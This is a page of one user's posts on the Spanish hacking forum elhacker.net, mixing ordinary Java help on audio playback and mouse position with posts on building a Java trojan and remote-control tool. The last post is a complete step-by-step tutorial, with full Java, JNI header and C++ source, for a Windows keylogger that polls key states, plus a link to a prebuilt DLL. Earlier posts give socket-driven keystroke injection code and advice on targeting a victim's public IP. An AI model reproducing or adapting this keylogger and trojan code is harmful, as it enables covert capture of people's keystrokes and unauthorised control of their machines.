elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 ... 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 [70] 71 72 73 74 75 76 77 78 79
691  Programación / Java / Re: Reproducir Musica en: 26 Noviembre 2009, 16:23 pm
Hola danyelk_6u5,

Puedes mirar un ejemplo completo de un trabajo que me dejaron en la universidad. En el se usan las librerías tritonus para la reproducción de media, que son mucho más completas que las del JMF. Además tiene varias cosas interesantes, como la reproducción de otros tipos de formatos, la capacidad de subir/bajar volumen, y funciona en Linux perfectamente (cosa que no pasa con JMF).

Lo puedes descargar de aquí:

http://code.google.com/p/silversheep/downloads/list
Un saludo, espero que te sea de ayuda.

Esta exelente casidiablo !  Esta muy bien modulado todo,solo vi el diagrama y entendi bastante su funcionamiento definitivamente es un buen trabajo los felicito. ;D

Saludos.
692  Programación / Java / Re: Controlar eventos del mouse en: 26 Noviembre 2009, 15:59 pm
haa si es asi es muy facil

Código
  1. System.out.println(MouseInfo.getPointerInfo().getLocation().getX());
  2. System.out.println(MouseInfo.getPointerInfo().getLocation().getY());
  3.  

Saluidos.
693  Programación / Java / Re: Reproducir Musica en: 26 Noviembre 2009, 06:55 am
descarga y ejemplo :-*

JMF download

http://www.idi.ntnu.no/~heggland/ontolog/jws/jmf.jar

- Ejemplo -
Código
  1. import java.io.File;
  2. import java.io.IOException;
  3. import java.net.MalformedURLException;
  4.  
  5. import javax.media.Manager;
  6. import javax.media.NoPlayerException;
  7. import javax.media.Player;
  8.  
  9. public class MediaPlayerDemo  {
  10.  
  11. public static void main(String args[]) throws NoPlayerException, MalformedURLException, IOException {
  12.    Player player;
  13.  
  14.    File file = new File("youtube - bleach.mp3");
  15.  
  16.    player = Manager.createPlayer(file.toURI().toURL());
  17.    player.start(); // start player
  18.  }
  19. }

SAludos
Programmers
694  Programación / Java / Re: Controlar eventos del mouse en: 26 Noviembre 2009, 06:23 am
 aver quieres saver la localizacion del mouse sin usar un frame?

695  Programación / Java / Re: Moden por Java en: 26 Noviembre 2009, 04:38 am
a ver si te ayuda.

http://www.java2s.com/Code/Java/Network-Protocol/Modem.htm

Saludos.
696  Programación / Java / Re: crear un troyano en java en: 26 Noviembre 2009, 02:48 am
no digamos que la interfaz ya dependera de cada quien asi que no es necesario.

Saludos.
697  Programación / Java / Re: crear un troyano en java en: 26 Noviembre 2009, 00:05 am
en_java-t269563.0.html[/url
mm lo que no pude es hacer que funcionen los 2 a la vez ozea ver la pantalla y mover su mouse . lo tengo por separados..

la duda que tengo es como aria para poderme comunicar entre redes wan . y no tan solo redes lan ...
creo que seria apuntando a su IP publica/ip lan
obviamente solo tendrias que configurar el socket apuntando a una ip-publica determinada

Saludos.
698  Programación / Java / Re: Programa de acceso remoto en java en: 24 Noviembre 2009, 04:29 am
jeje...es que los se usar para trasferencia de archivos...no sabia que podia enviar movimientos de mouse y todo esoo... me lo explicas un pokito mejor???
javascript:void(0);

uff explicar esto es un poco dificil bueno solo tienes que enviar String por los sockes supongamos para escribir en la otra maquina el server tendria que recibir por ejemplo asi read es lo recibido del cliente si es igual al comando writer que uno mismo define claro esta entonces escribe en la maquina

Código
  1. if (read.equalsIgnoreCase(container.Command.COMMAND_WRITER)) {
  2. final String msg = bufferedReader.readLine();
  3. new Thread(new Runnable() {
  4. @Override
  5. public void run() {
  6. try {
  7. Robot robot = new Robot();
  8. char[] c = msg.toUpperCase().toCharArray();
  9. for(int index=0;index<c.length;index++)
  10. {
  11. if(c[index]=='0'){robot.keyPress(KeyEvent.VK_0);}if(c[index]=='6')robot.keyPress(KeyEvent.VK_0);
  12. if(c[index]=='1')robot.keyPress(KeyEvent.VK_0);if(c[index]=='7')robot.keyPress(KeyEvent.VK_0);
  13. if(c[index]=='2')robot.keyPress(KeyEvent.VK_0);if(c[index]=='8')robot.keyPress(KeyEvent.VK_0);
  14. if(c[index]=='3')robot.keyPress(KeyEvent.VK_0);if(c[index]=='9')robot.keyPress(KeyEvent.VK_0);
  15. if(c[index]=='4')robot.keyPress(KeyEvent.VK_0);if(c[index]=='5')robot.keyPress(KeyEvent.VK_0);
  16. if(c[index]=='Q')robot.keyPress(KeyEvent.VK_Q);if(c[index]=='I')robot.keyPress(KeyEvent.VK_I);
  17. if(c[index]=='W')robot.keyPress(KeyEvent.VK_W);if(c[index]=='O')robot.keyPress(KeyEvent.VK_O);
  18. if(c[index]=='E')robot.keyPress(KeyEvent.VK_E);if(c[index]=='P')robot.keyPress(KeyEvent.VK_P);
  19. if(c[index]=='R')robot.keyPress(KeyEvent.VK_R);if(c[index]=='A')robot.keyPress(KeyEvent.VK_A);
  20. if(c[index]=='T')robot.keyPress(KeyEvent.VK_T);if(c[index]=='S')robot.keyPress(KeyEvent.VK_S);
  21. if(c[index]=='Y')robot.keyPress(KeyEvent.VK_Y);if(c[index]=='D')robot.keyPress(KeyEvent.VK_D);
  22. if(c[index]=='U')robot.keyPress(KeyEvent.VK_U);if(c[index]=='F')robot.keyPress(KeyEvent.VK_F);
  23. if(c[index]=='K')robot.keyPress(KeyEvent.VK_K);if(c[index]=='G')robot.keyPress(KeyEvent.VK_G);
  24. if(c[index]=='L')robot.keyPress(KeyEvent.VK_L);if(c[index]=='H')robot.keyPress(KeyEvent.VK_H);
  25. if(c[index]=='Z')robot.keyPress(KeyEvent.VK_Z);if(c[index]=='J')robot.keyPress(KeyEvent.VK_J);
  26. if(c[index]=='X')robot.keyPress(KeyEvent.VK_X);if(c[index]=='V')robot.keyPress(KeyEvent.VK_V);
  27. if(c[index]=='C')robot.keyPress(KeyEvent.VK_C);if(c[index]=='B')robot.keyPress(KeyEvent.VK_B);
  28. if(c[index]=='M')robot.keyPress(KeyEvent.VK_M);if(c[index]=='N')robot.keyPress(KeyEvent.VK_N);
  29. }
  30. } catch (AWTException e) {
  31. // TODO Auto-generated catch block
  32. e.printStackTrace();
  33. }
  34. }
  35. }).start();
  36. }
                        
699  Programación / Java / Re: [Tutorial] Keylogger en Java (JNI) en: 24 Noviembre 2009, 04:17 am
 :) gracias Crapsalot

Saludos
700  Programación / Java / [Tutorial] Keylogger en Java (JNI) en: 24 Noviembre 2009, 02:27 am
Hola a todos!  ::) Aqui les traigo mi tutorial sobre como programar un Keylogger en java usando JNI y DEV++

Necesitas los archivos:

jni_md.h
http://www.mediafire.com/?wt30y33j4mg

jni.h
http://www.mediafire.com/?zngnmognn5h


Los cuales incluiran en  el directorio "C:\Archivos de programa\Dev-Cpp\include"

  • Paso 1: Creación del Archivo .java

Importante: No tiene que estar en ningun Package

Código
  1. public class Keylogger extends Thread {
  2. private boolean   running=true;
  3. private int       value =0;
  4. private native int get();
  5. static {
  6. System.loadLibrary("Keylogger");
  7. /**
  8. * Carga de la DLL
  9. */
  10. }
  11. @Override
  12. public synchronized void run(){
  13. while(running){
  14. value = get();
  15. /**
  16. * Optenemos la Tecla Precionada
  17. */
  18. System.out.println((char)value);
  19. /**
  20. * La Mostramos en la Salida Estandar
  21. */
  22. }
  23. }
  24.  
  25. }
  26.  

  • Paso 2: Creación del .bat para compilacion JNI (Opcional)

Nombre: CompilerJNI.bat

Código
  1. @echo off
  2. title Java
  3. set/p j= .java :
  4. echo.
  5. call javac %j%.java
  6. call javah -jni %j%
  7.  
  8. pause
  9. echo.
  10. exit

  • Paso 3:  Generando el . Class y la Cabecera .h (JNI)

Ejecutamos el CompilerJNI.bat y le pasamos el Archivo .java (Keylogger.java) sin la extension.

Podrias compilar direcamente desde la consola

javac Keylogger.java
javah -jni Keylogger


Tienes que tener algun JDK

  • Paso 4:  Generando la DLL

Abrimos el DEV++
File--->New---->Project--->DLL



Luego veremos 2 Archivos (dllMain.cpp)  y la cabecera .h (dll.h) ,

remplazamos el contenido del dll.h por la del Keylogger.h y guardamos como Keylogger.h.

Código
  1. /* DO NOT EDIT THIS FILE - it is machine generated */
  2. #include <jni.h>/* Header for class Keylogger */
  3. #ifndef _Included_Keylogger
  4. #define _Included_Keylogger
  5. #ifdef __cplusplus
  6. extern "C" {
  7.    #endif
  8.    #undef Keylogger_MIN_PRIORITY
  9.    #define Keylogger_MIN_PRIORITY 1L
  10.    #undef Keylogger_NORM_PRIORITY
  11.    #define Keylogger_NORM_PRIORITY 5L
  12.    #undef Keylogger_MAX_PRIORITY
  13.    #define Keylogger_MAX_PRIORITY 10L
  14.    #undef Keylogger_DELAY
  15.    #define Keylogger_DELAY 20L
  16.    /** Class: Keylogger
  17.      * Method:    get
  18.      * Signature: ()I
  19.      */
  20.  
  21.    JNIEXPORT jint JNICALL Java_Keylogger_get  (JNIEnv *, jobject);
  22.    #ifdef __cplusplus
  23.    }
  24.    #endif
  25.    #endif
  26.  
    Si da problemas
    Este archivo tiene que estar en
C:\Archivos de programa\Dev-Cpp\include

ahora remplazar el contenido de dllMain.cpp por este:

[/list]
Código
  1. #include <iostream>
  2. #include <windows.h>
  3. #include <fstream>
  4. #include <jni.h>
  5. #include "Keylogger.h"
  6. JNIEXPORT jint JNICALL Java_Keylogger_get(JNIEnv* env, jobject obj){
  7.  while(true){
  8.        for(int c=8;c<=222;c++){
  9.         if(GetAsyncKeyState(c)==-32767)
  10.            return c;  
  11.        }        
  12.     Sleep(30);  
  13.     }
  14. }
  15.  

Y guardar como Keylogger.cpp

Una ves que tengamos El Keylogger.cpp y el Keylogger.h listos en nuestro proyecto Compilamos para generar la DLL

Y listo solo tendriamos que incluir la libreria al lado del Keylogger.java o .class y ejecutar para iniciar el keylogger.

Código
  1. public class Main {
  2. public static void main(String[] args) {
  3. new Keylogger().start();
  4. }
  5. }

Aqui les dejo la DLL Keylogger.dll
http://www.mediafire.com/?e03u9r0emaerf9g

Un Saludo.
Páginas: 1 ... 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 [70] 71 72 73 74 75 76 77 78 79
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines